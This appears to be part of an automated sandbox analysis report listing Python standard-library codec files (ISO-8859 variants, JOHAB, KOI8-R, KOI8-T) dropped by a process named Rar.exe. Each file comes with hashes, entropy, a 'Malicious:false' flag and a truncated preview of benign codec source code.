                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-13',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13959
                                                                                                                                                                                                                                  Entropy (8bit):4.584053979506915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:mHhsuOTDvR0UrXPLouhIAs2+ijLXwwTdW:DTKuhIAlvwkW
                                                                                                                                                                                                                                  MD5:445A9BD974736A30077C9BF14106E805
                                                                                                                                                                                                                                  SHA1:85E673B1E179E5886765F6051ED2F9235063F2F8
                                                                                                                                                                                                                                  SHA-256:C498772FADF244077B650E468E7922AE1C0DB74ED6984A2A81BC0E088631F0F9
                                                                                                                                                                                                                                  SHA-512:0D8D322C1DCCB5F2169F402CB82875A10D725F65DFBDE6E70515839CFC8451DD58DD5F938AED1DE25A2C1E74ACEADC7E07889F81C98808ECDE2F6F24D5C73D89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_14 generated from 'MAPPINGS/ISO8859/8859-14.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-14',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13519
                                                                                                                                                                                                                                  Entropy (8bit):4.566581461339518
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QHhsuOTDvRnUrXPLouhIAs2+ijLhFsVN6ATdo56G:NTNuhIAl5Fsto
                                                                                                                                                                                                                                  MD5:0D2C4FB1B7CCD0D085108F651A041593
                                                                                                                                                                                                                                  SHA1:947AF7C07B789EB743031C3C108BB2FDB882F673
                                                                                                                                                                                                                                  SHA-256:D703D64AE2D23602E38C2F387EEFFD5D4E5792209BC3CE64928FEE2F99DCD906
                                                                                                                                                                                                                                  SHA-512:3B24DE05424FBEFC09C8B3743DEA37C4AFEDE5C68A96D0721622D28A6AD42B47D2BB28011F39E6B89AD14B893DB545572537EC741090B880414C26CDF8845EDA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_15 generated from 'MAPPINGS/ISO8859/8859-15.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-15',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13864
                                                                                                                                                                                                                                  Entropy (8bit):4.596808715275571
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:fiHhsuOTDvRf+UrXPLouhIAs2+ijLOSVCXKm:fvT4uhIAlznm
                                                                                                                                                                                                                                  MD5:6ED16EE5F05DE02F25349CEBA19AFF51
                                                                                                                                                                                                                                  SHA1:B036FA26C737669AB311D450BE274CE57845EB9C
                                                                                                                                                                                                                                  SHA-256:F49FFF248546D510F7ECB5FC2C25C9B68925A2F483B938035CD7A54957A560A2
                                                                                                                                                                                                                                  SHA-512:18FFEC059B44077627A86139D2861509E28DC8564FC9B5F822C79E21E8A43043780469221B66743D5BFEF84552C3F787E25B721B87B2422A0AFCBCEC84953AE8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_16 generated from 'MAPPINGS/ISO8859/8859-16.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-16',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13711
                                                                                                                                                                                                                                  Entropy (8bit):4.594295226318269
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eHhsuOTDvR1UrXPLouhIAs2+ijLRG3RKjV:rTLuhIAlw4V
                                                                                                                                                                                                                                  MD5:62DC1A7320D0B8FB3FB535E0F2055446
                                                                                                                                                                                                                                  SHA1:02D0C9E5D224A0C6036C27C842EC54E3962681C3
                                                                                                                                                                                                                                  SHA-256:D9102AE464030E5A0F4D1712435AC3BDB2FA98ECAA689B5965442EF92B13DFEC
                                                                                                                                                                                                                                  SHA-512:29D58449D2B6216C9BB40E151E0133FC370D104C07C6960581B914495C8940B2B7C7B85E70514EB0D37313854A8EC2BDC3163406881B4521262CEBF26A385EAE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_2 generated from 'MAPPINGS/ISO8859/8859-2.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-2',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13396
                                                                                                                                                                                                                                  Entropy (8bit):4.597193229637006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uHhsuOTDvRCUrXPLouhIAs2+ijLA/SI7JbrO:7TIuhIAltIBC
                                                                                                                                                                                                                                  MD5:79D790F88E256CC8C968456344519BAB
                                                                                                                                                                                                                                  SHA1:6EA401BBD3082D55BA2235D768A80BEA52E4759A
                                                                                                                                                                                                                                  SHA-256:E372E25B32E8657DB9B57B3C9B53D68B67F3FC6651C53B071DCAC6CAB6662FCA
                                                                                                                                                                                                                                  SHA-512:EDB436E11FE172A73DD899E163F3D05D1DB6214755FCCCD7311A1923EF5EE8F7530D353D1EEB9BE8B9E435F250509CD114CE540BC4F928B32000A64E05EB4E9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-3',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13683
                                                                                                                                                                                                                                  Entropy (8bit):4.589930243244332
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:yHhsuOTDvRvUrXPLouhIAs2+ijL4Eo6z+:/T5uhIAlhb+
                                                                                                                                                                                                                                  MD5:4C0E2E5478CFC6B2A8134D5C5D3C76ED
                                                                                                                                                                                                                                  SHA1:73749BA58832D716683A2F76354BB032A3123E78
                                                                                                                                                                                                                                  SHA-256:164C26A1A13DC22A21A7F80E5C0176EA9223111B759D2ED1CD8B3C55AAB63BBD
                                                                                                                                                                                                                                  SHA-512:C469837BC68A419D91FD8EB0D52A2164D557C3EEBDA6E7F2B1040D18DFC6F94BDA827CFAC0EF44BF8F19DDE6B732A9AF3A48214EE0AFB143600D3D77E98F1C59
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_4 generated from 'MAPPINGS/ISO8859/8859-4.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-4',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13322
                                                                                                                                                                                                                                  Entropy (8bit):4.619153100357495
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:iHhsuOTDvRcUrXPLouhIAs2+ijL762Y+n:vT2uhIAlT62n
                                                                                                                                                                                                                                  MD5:70CB514B7CD7B9A494A55CB257553431
                                                                                                                                                                                                                                  SHA1:7F689F78B422164FDA39F897B45AAE7C8CCFE8DB
                                                                                                                                                                                                                                  SHA-256:4622BB45469E23C852698A6B784B5E28AFD8072FDDB8E319C02D39B138CB9DBE
                                                                                                                                                                                                                                  SHA-512:CCCA6974D74B32643D84198A626C28A6CC777B3D9853C90FDE3F61D54F8A41ED3C423CE2795402E6157A1529985C91E56B1D2C944EF3222E54CA8D2A232C0D6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-5',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11140
                                                                                                                                                                                                                                  Entropy (8bit):4.629970059245577
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvRhUrXPLouhIAs2+ijLeCdxeiu5iEp30yfZn:LTnuhIAlUH
                                                                                                                                                                                                                                  MD5:A69D78A4C1AB4134DC5033FA45821AAE
                                                                                                                                                                                                                                  SHA1:C0B9008772067BF43B1A817780D6B86DFCD87EF8
                                                                                                                                                                                                                                  SHA-256:1543F9AD8DCC4AA912C5C901A5A216A4EA3DB62FB19197A0D90CCC0EE69B4538
                                                                                                                                                                                                                                  SHA-512:230E26A9366387FAE38340921C675D3AD3CD8580096824842FA9261EB1BBA391E399525425030854FAA9F84819E57F7F9F238426B809274A6D78676143AC9F3B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-6',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13151
                                                                                                                                                                                                                                  Entropy (8bit):4.649031466938632
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvReUrXPLouhIAs2+ijLEARfO21XHHjfvK8uHZh:LTEuhIAl8AN11XO8Aj
                                                                                                                                                                                                                                  MD5:50BFFF8D67F78DF6B9941AD829159358
                                                                                                                                                                                                                                  SHA1:D766C9E1E2EA76FB3CA67793F36A3F45C1545132
                                                                                                                                                                                                                                  SHA-256:41FEB2BEC72E3F07C0D67F0E421FF8E51A8E1688AA20AF7C8A12CE0DDF464104
                                                                                                                                                                                                                                  SHA-512:00EEA3F1B69FA47E0DA4B7AC0E4AD0E8830A6A3E845B3D340A4ACB4DB0838D01423B4FFAD94863178ECAD72FA1053868CE506C5AF3C010C76A29D11F2BB992C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_7 generated from 'MAPPINGS/ISO8859/8859-7.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-7',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11343
                                                                                                                                                                                                                                  Entropy (8bit):4.621650787612196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:aHhsuOTDvR7UrXPLouhIAs2+ijLUSj6ZZPHxvi:3TluhIAlcSv
                                                                                                                                                                                                                                  MD5:E873B80A7B474B64BA463354A5D1A39A
                                                                                                                                                                                                                                  SHA1:58682E0EF443927AC206F8C0B70FB2636DD1C2C2
                                                                                                                                                                                                                                  SHA-256:63D11B2592BDB036C8F4150EC1F968D1A6E01D22AF8D7DAF94F6C72E0A8FD752
                                                                                                                                                                                                                                  SHA-512:185EA3AD52F3CE519171B5CBBB5BF7071C009A800121F368CD06118F1A82D37BA2A5526118D6A8B1117C5C9AD31699BD657903CDA9C4A25D6BB7D192C643C717
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_8 generated from 'MAPPINGS/ISO8859/8859-8.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-8',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13463
                                                                                                                                                                                                                                  Entropy (8bit):4.569353880954753
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:KHhsuOTDvRIUrXPLouhIAs2+ijLMZt6B5TdjN:nTiuhIAlEZt69x
                                                                                                                                                                                                                                  MD5:CAD4BC52AF4F5E24614AC8857D21DC35
                                                                                                                                                                                                                                  SHA1:49BDA77039C166194660CAF30885E17951603F3E
                                                                                                                                                                                                                                  SHA-256:FD0CCFDE95FCFEBF48BA5ED5F697C4799C3303B853077F48FFEF2FD9EF1E30C8
                                                                                                                                                                                                                                  SHA-512:6CBDC2C1F97DB4A9A1BFD1D1601C55F946C82BB5AE2844DDECC98A1B760B7EB292EA393DFD2A1D45BA99906397861BF01E1C0C3430D8285B517724F06F19D10E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-9',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                                                  Entropy (8bit):4.530496029691674
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nNqxOzSf/XokTZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj92FcJxFpz:Nqyzqt62VJjRU8njOxLnrxLbrLK8+Jx/
                                                                                                                                                                                                                                  MD5:161F7EEDD0B4169D0A36DA2E7808EB7B
                                                                                                                                                                                                                                  SHA1:35D8869963DBB870A4B9DF3C974DE9A5CF5F4E41
                                                                                                                                                                                                                                  SHA-256:C83AA2098AB15FBAD7EB999C303B27350B0459EE9F6FC2B2BF4004D4285F9E8D
                                                                                                                                                                                                                                  SHA-512:5219805C9AF0799449BA650FE4108B450A20A3864AC5CD7ADA83A5C2429F9604025E8F1F296A461600E73372779838971AB91F150060761597D670B4AB9ED531
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# johab.py: Python Unicode Codec for JOHAB..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('johab')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='johab',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14086
                                                                                                                                                                                                                                  Entropy (8bit):4.696171438355166
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:veHhsuOTDvRnUrXPLouhIAs2+i4bur6Zv8muyEdP:vrT5uhIAl/euxP
                                                                                                                                                                                                                                  MD5:75872A24381833D8B71D42A66523AA45
                                                                                                                                                                                                                                  SHA1:C4AC11C4903178821FE680C732462C02626C016B
                                                                                                                                                                                                                                  SHA-256:90A883B291D5F1E6DBB735413D51648C31580B1927500161C16624836D01E5EE
                                                                                                                                                                                                                                  SHA-512:A84BD3BDBC4BCBFE90B550CB4FFB6CDBEBBB4B1C3824A931CBA448E84C79D4D6B05D9D67C0718FA97F790B8C1071C775010058306BCEC2769D4E721808CED8FF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-r',.. encode=
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13501
                                                                                                                                                                                                                                  Entropy (8bit):4.664370116157909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ahsuOTDvRNUrXPLouhIAs2+imIzDCYPfuyEdP:fTLuhIAl5jfuxP
                                                                                                                                                                                                                                  MD5:B2F96B9A1CF37B7C81BE8704D4E62EF9
                                                                                                                                                                                                                                  SHA1:AB37BF387BF19A833126952D139E41093DD217D9
                                                                                                                                                                                                                                  SHA-256:86D922A935AFDE1BD7C22CF8A9F23A237511C92C51509A80051DD2862A84D09F
                                                                                                                                                                                                                                  SHA-512:F139A2AAB199BB95905B6C020A6410D9FC1C67486BB8AF7796CE41BCC8CDE7AE034749F50728162BE836AE2D4ED74D4ED82282EE56517843C404412C72756ECE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_t.."""..# http://ru.wikipedia.org/wiki/...-8..# http://www.opensource.apple.com/source/libiconv/libiconv-4/libiconv/tests/KOI8-T.TXT....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14069
                                                                                                                                                                                                                                  Entropy (8bit):4.689466302139651
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:SHhsuOTDvR6UrXPLouhIAs2+i4bur6e9zuyEdP:fTIuhIAl/5uxP
                                                                                                                                                                                                                                  MD5:211B71B4C717939EDEDBFD33A9C726BE
                                                                                                                                                                                                                                  SHA1:64DEB95FD1A59EC03B09643BE2F2055A079151E4
                                                                                                                                                                                                                                  SHA-256:9F77F72F8A42A1BA97C7D53AFDB6F6A6D4E08707CAA4D4CD57D6C113156BB32B
                                                                                                                                                                                                                                  SHA-512:3CBACB39A0994C5285E5B0316B3816916D43C6EE607398022B7BF05430A9621416C2F28A848C2E90B47BE147DDFFB7CF03D5CE8C129BFE52247D6AA238FF5639
                                                                                                                                                                                                                                  Malicious:false
